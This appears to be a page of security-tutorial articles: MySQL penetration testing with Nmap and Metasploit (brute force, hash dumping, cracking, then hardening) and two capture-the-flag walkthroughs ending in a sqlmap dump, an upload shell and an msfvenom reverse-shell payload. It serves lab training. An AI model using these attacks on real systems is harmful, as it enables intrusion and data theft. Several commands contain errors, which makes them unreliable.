MySQL Penetration Testing with NMAP

In this article we are discussing MYSQL penetration testing using Nmap where you will learn how to retrieve database information such as database name, table’s records, username, password and etc.

MySQL is an open Source for Relational Database Management System that uses structured query language for generating database record.  

Lets Begin !!!

 Scanning for port 3306

 open the terminal and type following command to check mysql service is activated on targeted system or not, basically mysql service is activated on default port 3306.

nmap -sT 192.168.1.216

From given image you can observe port 3306 is open for mysql service, now lets enumerate it.

Retrieve mysql information

Now type another command to retrieve mysql information such as version, protocol and etc:

nmap -script=mysql-info 192.168.1.216

Above command try to connect to with MySQL server and hence prints information such as the protocol: 10, version numbers: 5.5.57 -0ubuntu0.14.04.1, thread ID: 159, status: auto commit, capabilities, and the password salt as shown in given below image.

Brute force attack

This command will use dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

 nmap -p 3306 -script mysql-brute -script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

 From given image you can observe that it found the valid credential root: toor. This credential will help in directly login into MYSQL server.

Retrieve mysql user names

This command will fetch mysql users name which help of given argument mysqluser root and mysqlpass toor.

Nmap -p 3306 -script=mysql-users 192.168.1.216 -script-args mysqluser=root,mysqlpass=toor

From given below image you can see we had found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command will fetch mysql database name which help of given argument mysqluser root and mysqlpass toor.

nmap -p 3306 -script=mysql-databases 192.168.1.216 -script-args mysqluser=root,mysqlpass=toor

 From given below image you can read the name of created database such as ignite

This command will also perform same task as above but retrieve database name using mysql query “show database”

nmap -p 3306 192.168.1.216 -script mysql-query -script-args “query=show databases,username=root,password=toor”

 From given below image you can read the name of created database such as ignite

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.

This command will fetch mysql variables name which help of given argument mysqluser root and mysqlpass toor.

nmap -p 3306 -script=mysql-variables 192.168.1.216 -script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.

Retrieve Hash password

This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

nmap -p 3306 -script=mysql-variables 192.168.1.216 -script-args mysqluser=root,mysqlpass=toor

From given image you can observe that it has dumped the hash value of passwords of respective user which we have enumerated above.

Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

Penetration Testing on MYSQL (Port 3306)

Hello friends!! Today we are discussing internal penetration testing on MYSQL server. In our previous article we had already discussed how to configure of mysql in ubuntu which you can read from here, now moving towards for its penetration testing.

Attacker: kali Linux

Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Lets start !!

Scanning MYSQL

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 3306. 

nmap -sT 192.168.1.216

If service is activated in targeted server then nmap show open STATE for port 3306.

Enumerating MYSQL Banner

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for MYSQL version.

use auxiliary/scanner/mysql /mysql _version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

From given image you can read the highlighted text which is showing MYSQL 5.5.57 is the installed version of MYSQL with protocol 10 on ubuntu 14.04.1 operating system.

MYSQL Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file.

From given image you can observe that our mysql server is not secure against brute force attack because it is showing matching combination of username: root and password: toor for login.

Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.

Stealing MYSQL information using metasploit

This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.

use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

From given image you can observe that it has executed the sql query for dumping the name of databases.

This module extracts the schema information from a MySQL DB server.

use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) >set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) >set username root

msf auxiliary(mysql_schemadump) >set password toor

msf auxiliary(mysql_schemadump) >run

here it has dump the information schema for database “ignite” with table name “student” , 5 columns name with column types:

DB: ignite

Table name: student

Last Name

(varchar 30)

First Name

(varchar 30)

Student ID

(int 11)

Major

(varchar 20)

Dorm

(varchar 20)

Check file privileges

Open my.cnf file to verify file privileges using following command:

gedit /etc/mysql/my.cnf

Here you can see given below statements are uncommented

  • Mysqld_safe
  • Mysqld
  • Secure_file _priv

If these statements are uncommented then it becomes very easy for attacker to perform file enumeration.

Mysql File Eumeration

This module will enumerate files and directories using the MySQL load_file feature.

Use auxiliary/scanner/mysql/mysql_file_enum

msf auxiliary(mysql_ file_enum) > set rhosts 192.168.1.216

msf auxiliary(mysql_ file_enum) > set username root

msf auxiliary(mysql_ file_enum) > set password toor

msf auxiliary(mysql_ file_enum) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_ file_enum) > run

Here it will start identifying whether the given files list is exist in the target system or not.

From given image you can observe that it has found /etc, /var, /var/www such directory exists.

Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text test will be written to the directory. ***

use auxiliary/scanner/mysql/mysql_writable_dirs

msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216

msf auxiliary(mysql_writable_dirs) > set username root

msf auxiliary(mysql_writable_dirs) > set password toor

msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_writable_dirs) > run

Here we had assign a list of files so that we can identify the writable directory and from given image you can observe that it has found writable permission only for /tmp.

Mysql User Enumeration

This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.216

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > set password toor

msf auxiliary(mysql_enum) > run

It will start retrieving information such as list of other user account and user privileges on mysql server.

From given image it will be clear to you, that it has shown list of account with hash password and list of user who have GRANT privileges.

As you can see other than user root it has some more user such as sr with hash password, here you can crack this password using password cracker tool.

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > set toor

msf auxiliary(mysql_hashdump) > run

Now from screenshot you can see the hash value of password is given for all users. Metasploit store these hash value inside /tmp folder and later use john the ripper for cracking password.

This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mysql_fast

msf auxiliary(jtr_mysql_fast) >options

msf auxiliary(jtr_mysql_fast) >run

By default it will use metasploit wordlist where hash value has been saved and start cracking hash value.

If you notice the given below image you can perceive that it has successfully crack the double SHA-1 hashing and decrypt the password into plain text.

Now using above retrieved credential you can try to login into mysql server.

Here you can see we had successfully login into server. Hence attacker can easily breach the security of server and steal the important information or modify it.

Secure MYSQL through port forwarding

In order to secure mysql server admin can forward port from default to specific port to run the service. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Now change port 3306 into any other port such as 3000 as shown in given image and save the changes and restart the service.

service mysql restart

Verify it using nmap command as given below:

nmap -sT 192.168.1.216

Prevent Mysql against brute force attack

In order to secure mysql server admin can bind the service to its localhost. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Only you need to enable bind-address by making it uncomment  as shown in given images.

service mysql rstart

Now let’s verify it by making brute force attack same as above using dictionary.

Great!! Attacker is not able to connect the server which resists brute force attack also as shown in given image.

Admin should GRANT all privilege to a specific user only with specific IP address which prevents database information alteration from attackers.

Now for granting all privileges; login into mysql server and type following query:

mysql> GRANT ALL PRIVILEGES ON *-* TO ‘root’@‘192.168.1.220’ IDENTIFIED BY ‘toor’ WITH GRANT OPTION;

To tell the server to reload the grant tables, perform a flush-privileges operation

mysql > flush privileges;

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

Hack the thewall VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as thewall. The credit for making this vm machine goes to “Xerubus” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.17 but you will have to find your own)

netdiscover

We did a nmap scan but it showed nothing. So we use arp to check if it is broadcasting anything.

arp –an

We found that it is broadcasting something on the network, so we use wireshark to check at which port it is broadcasting the data.

We found that it is broadcasting something at port 1337 so we use netcat to listen at port 1337.

nc –lvp 1337

We found it was broadcasting something related to pink Floyd, we again do a nmap scan to check if it affected anything.

nmap -sV 192.168.0.17

As we can see that port 80 is open, so we open this ip in our browser.

We take a look at the source code of the browser and find a hexadecimal encoded string.

When we decode it we find a md5 encoded string and hint to do stegnography.

We decode the md5 encoded string and found a string called divisionbell.

We download the image from the webpage and using steghide we check if something is hidden behind the image. When try to extract information it prompts for password using the string we decoded above we are able to find that a text file is hidden behind the image and are able to extract it.

steghide –info pink_floyd.jpg

steghide extract –sf pink_floyd.jpg

When we open the text file we find a base64 encoded string and md5 encoded string and a hint to use it at port 1965.

First we decode the base64 encoded string and found the string SydBarret.

Then we decode the md5 encoded string and found the string pinkfloydrocks.

Port enumeration on 1965 shows it is running openssh, we check if we can login using this as username:SydBarret and password:pinkfloydrocks.

When we try to login it shows us that we can only connect through sftp. So we use SydBarrett as username and pinkfloydrocks as password to login through sftp.

Now that we are inside, we find a file called eclipsed_by_the_moon, we download it to our system.

We check what kind of file it is, we find that it is a zip file, we extract it using tar.

file eclipsed_by_the_moon

tar xvfz eclipsed_by_the_moon

After extracting the file, we check what kind of file it is and find that it is a boot sector.

file eclipsed_by_the_moon.lsd

We check if we can recover any file inside the boot sector using testdisk.

testdisk eclipsed_by_the_moon.lsd

We select the image to recover files from.

We select none portioned media as it is a boot sector.

We go to advanced to recover file from the image.

We then select the partition in which we want to extract the file from and select undelete to recover the files.

We find that an image file is recovered, we copy it.

We select the directory of our system in which we want to copy the file.

We check the image we just recovered and find the picture of Roger Waters, we also got a password inside the image.

We login trough ssh, enumerating the username we find that RogerWaters is the username and password is hello_is_there_anybody_in_there.

After getting in, we find that there are different directory for different users of pink floyd band members.

ls -al

We also find that we have limited access and cannot access their directories so we check for binaries available to other users and find that user NickMason and DavidGilmour have binaries called brick and shineon available to them.

find / -user DavidGilmour 2>/dev/null

find / -user NickMason 2>/dev/null

We don’t have access to run the binary shineon but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.

Now we can access the directory NickMason/. We find an image file inside we use scp to send it to our local system.

scp nick_mason_profile_pic.jpg [email protected]:/root/Desktop

We check the file type and find that it is an audio file. We change the file from .jpg to .ogg.

When we listen to the audio, we find that morse code is also playing in the background along with the music. We cut the frequency of the audio to retrieve the morse code.

.-. .. -.-. …. .- .-. -.. .– .-.  .. –. …. – .—- —-. ….- …– ..-. .. … .-

We find that the morse code translates to richardwright1943farfisa. We use RichardWright as username and 1943farfisa as password to login as user RichardWright.

Now we try to run the binary shineon, after running the binary we find that we can change the folder with symbolic link from DavidGilmour to RichardWright.

ln –s /bin/ksh /tmp/mail

export PATH:/tmp:$PATH

When we now run the shineon we become user DavidGilmour.

Inside DavidGilmour/ folder we find a link inside the file.

When we open this link on the browser we find an image on which something is written.

When we decrease the contrast of the image, we find a hexadecimal string.

Then we also send an image file that we find inside the DavidGilmour/ folder using scp.

scp david_gilmour_profile_pic.jpg [email protected]:/root/Desktop/

We check for strings inside the image file and found string who_are_you_and_who_am_i.

Now we use DavidGilmour as username and who_are_you_and_who_am_i as password.

We now are in welcometothemachine group; we move inside /var/www/htdocs/welcometothemachine/.

We find a file called PinkFloyd, we run the file and find it asks a question. We use the hexadecimal string inside the image we find on the webpage.

Now we are given the permission to get root, as DavidGilmour is added into sudoers after running this program.

Now when we enter root/ directory and we find the flag stating the end of the VM challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

 

Hack the IMF VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as IMF. The credit for making this vm machine goes to “Geckom” and it is another CTF challenge where we have to find 6 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.25 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sV  192.168.0.25

We find port 80 is open, so we open the ip address in our browser.

We take a look at our source code and found a few javascript files that look like base64 encoded.

We open them and find nothing interesting but when we join their name and decode them we find our 2nd flag.

Inside the flag we find another base64 encode string, decoding it we find a string called imfadministrator.

We take a look around the website and in the source code of contact.php page we find our 1st flag.

Flag 1 contains a base64 encoded string decoding it we find a string called allthefiles.

We open allthefiles and imfadministrator on the browser. We find that imfadministrator is a directory that leads to a login page.

In the contact.php page we found a few email addresses so we use cewl to make a dictionary.

We use burpsuite to launch a dictionary attack. We select the position and change the password from string to array.

Now we find the third flag in our response, when the login is successful.

Now that we can access the page we see that the page might be vulnerable to sql injection.

Using burpsuite we capture the request of this page and save it in a text file.

We use sqlmap to dump the database.

sqlmap -r /root/Desktop/imf.txt –dbs –batch –dump-all

We find the name of the pages along with another page called tutorial-incomplete. We open it on our browser and find a page with QR-code inside an image.

When we decode the QR-code we our 4th flag.

Inside our flag we find a base64 encoded string, when we decode it we find a string called uploadr942.php         

We open it on our browser and find a page to upload a file.

Now while uploading a shell we find that it is protected from WAF, so we create a custom shell and save it as GIF file to bypass the WAF.

Now we upload the file and check the response from the server to find where our file is uploaded.

We find server sends a string in a comment, we find our file is in uploads folder and the comment in the response sent by server is the name of our file.

After finding our shell, we find 5th flag. Now we use web_delivery to take reverse shell using metasploit.

We setup our metasploit for web delivery and execute the command on our shell.

Now that we have the reverse shell we take a look inside 5th flag

We find a base64 encode string when we decode it we find a string agentservices.

We check the connections of our server using netstat

netstat -antp

We found a service running on port 7788, we use curl to find what the server is running on port 7788.

curl localhost:7788

We find a service called agent is running so we find the location of agent using which command

which agent

When we move into the folder we found a file called access_codes, we open it and find a few numbers. It looks like a sequence for port knock.

So we knock the server and find that port 7788 opened.

Knock 192.168.0.25 7482 8279 9467

Now we download agent program file to our system for reverse engineering.

download agent /root/Desktop

Now we reverse engineer the file to find an exploit. First we disassemble main function.

gdb -q agent

disassemble main

We find that at memory address 80486ba, string compare function takes place so we add a break point there.

We break the program at 80486ba, and run the program. After running the programs, we look at the memory locations associated with the program.

break *0x80486ba

info registers

We look inside four halfwords of memory above starck pointer

x/4xw 0xffffd340

In the memory address 804c070 we found the password to access the program.

x/s 0x0804c070

Now we access the program from the server using netcat and find that the string can give us access to the program

netcat 192.168.0.25 7788

Now we create an exploit for this program, first we create a shellcode for msfvenom payload.

msfvenom –p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 –f python –b \x00\xa0\x0d

Now we create our exploit using python. We manually fuzz the memory location inside our exploit.

We setup our handler on metesploit and execute the shell.

msf > use exploit/multi/handler

msf exploit (handler) > set payload linux/x86/meterpreter/reverse_shell

msf exploit (handler) > set lhost 192.168.0.15

msf exploit (handler) > set lport 4444

msf exploit (handler) > run

now we check for sessions and take the interactive shell

msf exploit (handler) > sessions

msf exploit (handler) > sessions -i 3

Now we take shell check our privileges, we find that we are root. When we move inside the /root/ folder we find our 6th and final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

Related Posts Plugin for WordPress, Blogger...